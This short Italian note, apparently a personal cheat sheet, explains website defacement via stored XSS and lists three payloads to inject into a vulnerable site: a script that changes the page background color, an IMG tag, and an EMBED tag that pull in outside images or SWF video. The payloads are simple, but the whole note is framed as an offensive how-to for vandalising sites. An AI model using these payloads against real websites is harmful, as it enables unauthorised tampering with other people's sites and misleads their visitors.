tags: defacing defacing_siti_web
Il defacing consiste nel rovinare graficamente un sito web per esempio cambiando le immaggini o i testi. Per far si che questo possa accadere abbiamo bisogno di una vulnerabilità persistente come potrebbe essere una Stored XSS, ecco alcuni payload:
#Cambiare colore dello sfondo
<script>document.body .bgColor="red";</script>
#Inserire un immagine
<IMG SRC="http://www.immaginechevuoi.jpg">
#Inserire un video
<EMBED SRC="http://sitochevuoi.com/videochevuoi.swf">